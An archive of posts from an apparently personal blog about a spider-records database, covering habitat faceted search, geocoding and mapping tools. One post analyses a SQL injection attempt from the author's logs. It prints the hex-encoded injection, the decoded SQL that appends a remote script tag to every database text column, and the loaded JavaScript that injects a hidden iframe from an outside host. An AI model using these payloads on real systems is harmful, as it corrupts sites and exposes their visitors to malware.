Friday, July 25, 2008

Show Me...Crab Spiders on Bark



One of the DarwinCore elements for specimen and observation data is "habitat". To my knowledge, not a lot has been done with these data. Either there are actually few records cached at GBIF that have this field filled or the data are in a such a mess as to be (mostly) unusable. I certainly hope it's not the latter. No matter how messy, there is still a wealth of information here if one takes the time to sift through it. The data are not unlike folksonomies and someone with more patience than me could probably develop a natural classification of these terms.

Faceted search is a first crack at making these data useful, because there is certainly more trajectories into the data than without making use of the data. For a first cut at this, I pulled 30 random contributed specimen records in the Nearctic Spider Database for each species and merely display the full contents on the species pages. Then, I index the pages as always using my trusty Zoom Search. Voila, a quick way to do some quick, faceted searches. It's not perfect, but it's better than nothing. Where "crab spider bark" or "wolf spider beach" once produced no search results, there are now 5 and 17 results returned, respectively. Incidentally, Flickr produced 13 and 18 results, respectively but many images are useless.

Sunday, July 20, 2008

Green Porno

I couldn't resist sharing these. Pure genius. Kudos to Isabella Rossellini.

SQL Injection Attacks!

I was browsing through my web logs this morning and discovered some clever attempts to hack into my database using a technique called SQL injection. Here's a portion of one line in the web log:

/data/canada_spiders/AllReferences.asp Letter=F;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

The semicolon after "Letter=F" above is an attempt to mark the close of the SQL within the page "/data/canada_spiders/AllReferences.asp" and everything else after it is crap that could be executed on the server. Had I constructed my SQL on the page to be something like:
SELECT * FROM [TABLE] WHERE [COLUMN] = "" & [LETTER F] & ""

...where [LETTER F] is the parameter passed from the URL, I would have exposed myself to something potentially serious. So, instead of:
SELECT * FROM [TABLE] WHERE [COLUMN] = "F"

...the executed SQL would have been:
SELECT * FROM [TABLE] WHERE [COLUMN] = "F";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

Cool.

So, just what is all that crap? Well, it's a SQL Server-specific bit of code that is HEX-encoded. The full decoded HEX is as follows:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bnrc.ru/ngg.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Hmm. What does this mean? Well, it's an attempt to do something very scary - update every cell in every table to include a reference to a snippet of JavaScript. So, the next time any data are pulled from the database for presentation on a website, there is the potential to include hundreds of references to a remote JavaScript file.

So, what's in the JavaScript? This:
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("dssndd=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "dssndd=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://iogp.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

OK, so an iframe is inserted. Cripes, will it ever end? What's in the iframe? A page with some obfuscated JavaScript that loads with the rendering of the page. This is as far as I got. But, others have also discovered this and note that the JavaScript in that iframe is at least a redirect to msn.com. If you conduct a search for "ngg.js", you can pull up a whole heap of sites indexed by Google that have apparently been affected with this SQL injection attack. So, if you visit a web site, click a link and get mysteriously redirected to msn.com, something may have just happened to your browser.

But, I have still not idea what the ultimate end game is. What the heck is in the obfuscated JavaScript in the iframe? Anyone?

Saturday, July 19, 2008

Google Geocodes

Since I have been on a kick this weekend getting back into the mapping thing, I decided to see what was new in the world of the Google Map API and discovered plenty of new great things. For example, folks have developed reverse geocoders. It's a shame however that the full ISO country names aren't used. Rather, only the country codes are made available via Google's geocode API. I would have much rather had the full country name and the full "AdministrativeAreaName" (i.e. the State or Province in Google Map API parlance) because I could then use this in the AJAX data grid for contributors of specimen records to the Nearctic Spider Database. Similarly, applications like Specify could have taken advantage of this to help users clean or check their data as these are entered.

Nevertheless, I tweaked my old Google Map Geocoder to take advantage of all these advancements. The point of this little gadget is to click a map and get the location and coordinates. In this era of GPS units and iPhones, this may be rather pointless. But it was fun to see what I could do in an hour or so.

Friday, July 18, 2008

Simple Mapper

With the recent mapping craze this past decade and the fascination with AJAX tiling, a serious deficiency has been a simple mechanism to produce a black & white line map with points to mark collection locations for use in an outgoing manuscript. While at the recent American Arachnological Society meetings at Berkeley, California, I casually mentioned in a presentation I gave about the Nearctic Spider Database that someone should make such a service. Well, I made one...at least the start of one, right HERE.

I know, I know, yet another mapping service. But, this one serves a very specific purpose. It could no doubt be expanded and made more customizable such as different points for multiple species (a bit tougher) and an option to use a global map instead (trivial), but it's a start to producing something that hopefully satisfies a very different need.